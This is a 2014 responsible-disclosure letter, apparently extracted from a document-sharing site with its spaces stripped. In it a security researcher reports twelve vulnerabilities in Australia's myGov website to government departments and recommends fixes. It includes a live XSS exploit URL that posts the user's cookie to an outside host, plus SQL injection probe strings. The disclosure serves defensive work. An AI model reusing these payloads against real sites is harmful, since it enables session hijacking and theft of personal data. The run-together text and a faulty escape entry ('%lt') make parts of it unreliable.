Você está na página 1de 6

NikCubrilovic

nikcub@gmail.com
+61435177210

Friday2ndofMay2014

To: InformationSecurityContact
DepartmentofHumanServices

Cc: DepartmentofFinance
OfficeofAustralianInformationCommissioner

Re: URGENTSecurityissuesonmyGovwebsite

MynameisNikCubrilovicandIamanindependentsecurityconsultantandpenetrationtester.Iam
writingtoyoutoreportnumeroussecurityissueswiththemyGovwebsite.Themostseriousof
thesesecurityvulnerabilitieswouldallowanattackertohijacktheaccountofanyregisteredmyGov
user.

Ifoundtheseissuesafterconductingaverybasicsecuritytestofthewebsiteafterreadingthe
storybyBenGrubbaboutmyGovintheSydneyMorningHeraldonMonday:

Australiansprivategovernmentdetailsatthemercyofhackers,sayITsecurityexpertspublished
onthe28thofApril2014:

http://www.smh.com.au/itpro/governmentit/australiansprivategovernmentdetailsatmercyofha
ckerssayitsecurityexperts20140428zqzkg.html

Pleaseseethatthedetailsofthisreportareroutedtotherightpeoplewhowouldbeabletobring
urgentattentiontogettingtheseissuesfixed.IwasunabletofindasecuritycontactonthemyGov
ordepartmentwebsite.

Pleasefindthedetailsofeachissuebelow,feelfreetocontactmeonemailorphonenumberlisted
above.

NotethatIhaveonlytestedthepublicinterfacesofthemyGovwebsite,andhavenotcarriedout
anexhaustivepenetrationtestoftheservice.Theissuesfoundwithonlythepublicinterfaceleads
metoconcludethattherearelikelymoresimilarissueswiththeservice.

ThemostseriousoftheseissuesallowanattackertohijacktheaccountofanymyGovuser.Ihave
successfullycarriedoutthisattackagainstmyownmyGovaccountusingtwocomputers.
Issue 1: CrossSite Scripting Vulnerabilities in Enrollment Service
TheURLathttps://my.gov.au/EnrolService/enrolService.htmcontainstwocrosssite
scriptingvulnerabilities.TheURLqueryparameters_flowExecutionKeyand_flowIdbothdo
notfiltertheirvaluesandpassthemintotheoutputunalteredandunsanitised.Thismeansthatan
attackercaninjectJavascriptintotheparameterandhaveitexecutedwithinthecontextofausers
myGovsession.Thiscanleadtocapturingkeystrokes,dataorhijackingauserssessionby
capturingtheircookie.

HereisanexampleexploitURL(WARNING:Thisisaliveattack):

https://my.gov.au/EnrolService/enrolService.htm?_flowId=enrolmentmgflow&_flo
wExecutionKey=e2s13f652%3cimg%20src%3da%20onerror%3d%22$.post('http://s03.do.n
ikcub.com/get.php',document.cookie)%22%3e24aae26396

Thisvulnerabilitycanbeexecutedinthebackgroundofanotherpage,orinanIFRAME.This
exploitcanworkonallbrowserandacrossallplatforms.

HereisascreenshotofmybrowserexecutingmyownJavascriptonthemyGovwebsite:

Recommendation:Userinputshouldbefilteredandpreferablywhitelisted.Anyoutputthatis
meanttoberenderedonanHTMLpageshouldbeescaped(HTMLencodedcharacter
references).Examples:

Character EscapedOutput
&quot
< %lt
> &gt
& &amp
&quot

Issue 2: Server Crash on malformed input


Theservercanbemadetoreliablycrashwithmalformedinput.TherearenumerousURLsand
numerousparameterswhereinputoutsideoftheexpectedbounds(eg.AZ,az,09)causesthe
servertocrashwitha500error.

Aservercrashingonunexpectedinputisindicativeofimproperinputhandling,whichoftenleadsto
SQLinjectionandcrosssitescriptingattacks(asseeninIssue1).

Thenumberofpagesandparametersthatcrashonimproperinputaretoolongtolisthere,but
someexamplesare:

URL Parameter Value Result


/LoginServices/main/login execution(GET) 500
/LoginServices/main/login ajaxSource <>%)(&+ 500
/LoginServices/main/login _eventId_SignIn <>%)(&+ 500
/LoginServices/main/login fragments <>%)(&+ 500
/LoginServices/main/login _flowExecutionKey <>%)(&+ 500
/LoginServices/main/login credentialType <>%)(&+ 500
/LoginServices/main/login userId <>%)(&+ 500
/LoginServices/main/login password <>%)(&+ 500
/LoginServices/main/login execution(GET) / 500

Recommendation:Userinputshouldbethoroughlyfiltered,sanitizedandthenvalidated.Improper
inputhandlingisthecauseofmostcommonsecurityissueswithwebapplications,andoftenlead
tobugsthatarebotheasytodiscoverandeasytoexploit.

Issue 3: SQL Injection Attack


IntheURL/LoginServices/Authenticate.doparameternameisvulnerabletoSQLInjection.
SQLInjectioniswhereinputfromtheuserisnotadequatelyfilteredandisallowedtoalterqueries
beingexecutedonthedatabase.

Inthe/LoginServices/Authenticate.doURLanyparameternameisinjectable.Thisis
identifiedbylookingatthedifferentresponsestotwoSQLqueries:onewhichreturnstrueand
anotherwhichreturnsfalse.Examples:

URL ResponseType Length


/Authenticate.do?(select%201)=1 Error400:BadRequest 355bytes
/Authenticate.do?(select%201%2c2)=1 200OK 4253bytes

ThereareotherURLsthatalsogiveouteitherservererrorsorvaryingresponsestodifferent
true/falseSQLcombinations,whichisindicativeofanSQLinjection.
Recommendation:Aswiththeaboveexamples,thisisaresultofinputfiltering.Alluserinput
shouldbefiltered,sanitizedandthenvalidated.
Issue 4: Sessions are incorrectly expired
ThemyGovwebsitessetsnumerouscookiesintheuserbrowserforsessionmanagement.The
primarycookieusedtoauthenticatetheuserissetasasessionbasedcookie,whichmeansthe
cookieremainsvalidaslongastheuserhasnotrestartedtheirbrowser.

Insteadofusingthecookiestandardtoexpirethesession,themyGovapplicationrunsaJavascript
functionthatcheckstheusersinactivitytimeandthenexpiresthecookieusingJavascript.Thisis
notthecorrectwaytoimplementshortlivedusersessions,norisittheindustryacceptedmethod
forimplementingshortlivedsessionswithasetexpirytime(inthiscase15minutes).

Thereasonwhythismethodofsessionexpirationisunsafeisbecauseanattackerusinga
techniquesuchasthecrosssitescriptingvulnerabilitydescribedinissue1isabletoalterthe
Javascriptandpreventtheexecutionoftheexpiryrouting.

Javascriptalsohasnoreliablemethodofexpiringcookies,andtherearemanywaysinwhichthe
expirationcanbeblockedorpreventedfromrunning(adblockingsoftware,theJavascriptsource
notbeingloadedcompletelythusnotexecuting,etc.)

Recommendation:Implementthesessionbysettingaproperexpirydateonthecookiewhichis
15minutesinthefuture.Thecookiewillthenbeexpiredusingthestandardmechanismbuiltinto
thebrowser,ratherthanacustomtechniqueimplementedinJavascript.

Issue 5: No security flag set on cookies


ThecookiesthataresetonthemyGovwebsitedonotsetthesecureflag.Thismeansthatwithan
SSLstrippingattack(whereanattackersitsinbetweentheuserandthewebapplication)the
cookieswouldbesentovertheclear,allowingtheattackertohijacktheuserssession.

Themostcommonapplicationofsuchavulnerabilitywouldbewithusersconnectedviapublicwifi,
whereanattackeronthesamenetworkcouldmasqueradeastherouterandinterceptalltraffic
andactasaproxyinterceptingsensitivedata.

Recommendation:Setthesecurityflagoncookies.
Issue 6: No strict transport security set
Relatedtothesecurecookiesissue,themyGovwebsitedoesnotforcethebrowsertouseanSSL
connectionusingtheHTTPStrictTransportSecuritystandard.Thisallowsanattackeractingina
proxycapability(amaninthemiddleattack)tostripSSL.

ModernbrowserssupporttheHTTPStrictTransportSecuritystandard,whereuponafirst
connectionthebrowserwillrefusetoconnecttoawebsiteunlessitisbothoverSSLandtothe
serverwiththesamecertificatesignature

Recommendation:SettheStrictTransportSecurityheaderinallwebserverresponses.For
furtherdetailsseetheRFCfortheHSTSstandard,number6797athttp://tools.ietf.org/html/rfc6797
Issue 7: Cookies do not set the HttpOnly flag and can be read in Javascript
ThecookiessetbythemyGovwebsitedonotsetthesecureflag,whichmeansanexploitsuchas
thatdescribedinissue1,isabletoreadandhijacktheusersession.

Recommendation:SettheHttpOnlyflagoneachcookie.Cookiesonasecurewebapplication
shouldnotbeabletobereadbyJavascript.
Issue 8: Password authentication is susceptible to bruteforce attacks
TheloginmethodonmyGovdoesnotcontainaCAPTCHA,usedtodistinguishbetweenhuman
authenticationattemptsandattemptsfromabot.Theloginmethodalsodoesnotthrottlerequests
fromauser.Thecombinationofthesetwoissuesmeanthataprogramcanbewrittento
bruteforceattackuserpasswords.

Recommendation:ImplementaCAPTCHA.Implementthrottlingonuserauthenticationviaan
applicationlevelfirewall,orimplementasidechannelforauthentication(seeIssue10).
Issue 9: No bruteforce or robot protection on account linking
WhenamyGovuserlinksanaccount,itrequiresinformationsuchasausersfirstname,surname,
addressanddateofbirth.Theserverresponsesindicatetotheuserwhichfieldisnotmatchedand
ifthelinkdetails(suchasaMedicarenumber)arevalid.

Anattackerisabletobruteforcethesedetailsusingabotasthereisnohumancheck(CAPTCHA)
orthrottlingofrequests.

Recommendation:Asperpasswordauthentication,implementaCAPTCHAandapplicationlevel
requestthrottlingonaccountlinking.
Issue 10: No sidechannel authentication of user accounts
Relatedtothepreviousissueisthelackofasidechannelmethodofuserauthentication.The
authenticationtokensusedonregistrationofmyGovaccountsareausersname,surname,dateof
birthandforexampleamedicarenumber.Noneoftheseparametersaresecrets.

Thisleavesauthenticationsusceptibletoauthenticationattackswhereanattackercouldextract
theseauthenticationsecretsusingmethodssuchassocialengineeringorspearphishing.

Recommendation:Implementasidechannelforuserauthentication.Anexamplewouldbe
sendingauniquecodetoaverifiedmobilephonenumber,ortoaverifiedmailingaddressforthe
user.Thisuniquetokenwouldserveasproofofidentityintheauthenticationandauthorization
routing.
Issue 11: Frameable response (clickjacking)
AwebpagecontrolledbyanattackerisabletoloadthecontentofthemyGovwebapplication
withinaniframeonanotherpage.Thisenablesa"clickjacking"attack,inwhichtheattacker'spage
overlaysthetargetapplication'sinterfacewithadifferentinterfaceprovidedbytheattackerand
capturestheusersclicksorlogininformation.

Aframeablewebapplicationalsomeansthataspartofacrosssitescriptingattack(seeIssue#1)
theattackdoesnothavetosendthevictimadirectURLtomyGov,butmayinsteadloadtheexploit
URLinthebackgroundofanotherpage(suchasaforum,websiteoronanadnetwork)

Recommendation:TheservershouldsetasuitableXFrameOptionsheader(eg.SAMEORIGIN
whichwouldpreventthepagebeingframedonanothersite).

TheXFrameOptionsheaderisdescribedinRFC7034andissupportedbyallmajorbrowsers.
TheRFCcanbefoundathttp://tools.ietf.org/html/rfc7034
Issue 12: No security point of contact
UpondiscoveryoftheseissuesIattemptedtotrackdownasecuritypointofcontact.ThemyGov
websitedoesnotpublishacontactaddress,PGPkey(forsecurecommunication)ordetailsofa
disclosurepolicy.

Recommendation:AddadetailedsectiontothesecuritypageofthemyGovwebsitewhereusers
andsecurityresearcherscanreportsecurityissues.Includeacontactemailaddress,phone
number,PGPkeyanddetailsofthedisclosurepolicyforthewebsite.
Responsible Disclosure
Itismyintentiontomaketheseissuespublicatsomepointinthefuture.AsmyGovhasno
publishedresponsibledisclosurepolicy,wecanapplytheindustrystandard7daydisclosure
timeline.

SeeGooglesdisclosurepolicyasanexample:

http://googleonlinesecurity.blogspot.com.au/2013/05/disclosuretimelineforvulnerabilities.html

Iwouldconsiderthecrosssitescriptingvulnerabilitytobeacriticalissuethatrequiresurgent
attention.

Ifthedepartmentrequireslongerthan7daystofixthisissue,pleaseletmeknow.Iwouldalsoask
thatthedepartmentconfirmreceiptoftheseissuesandanyresponseassoonaspossible.

MyprimaryconcernisthesecurityofusersofthemyGovservice.Ithinkthereisahighprobability
thatthecrosssitescriptingvulnerability,orsomecombinationoftheotherissueshavebeen
exploitedinthewild.

Goodsecuritypracticeandpolicythrivesinanenvironmentoftransparencyanddisclosure,hence
myintentiontodetailtheissuesfoundonthemyGovwebsiteonmyblogoncetheyhavebeen
fixed.

Você também pode gostar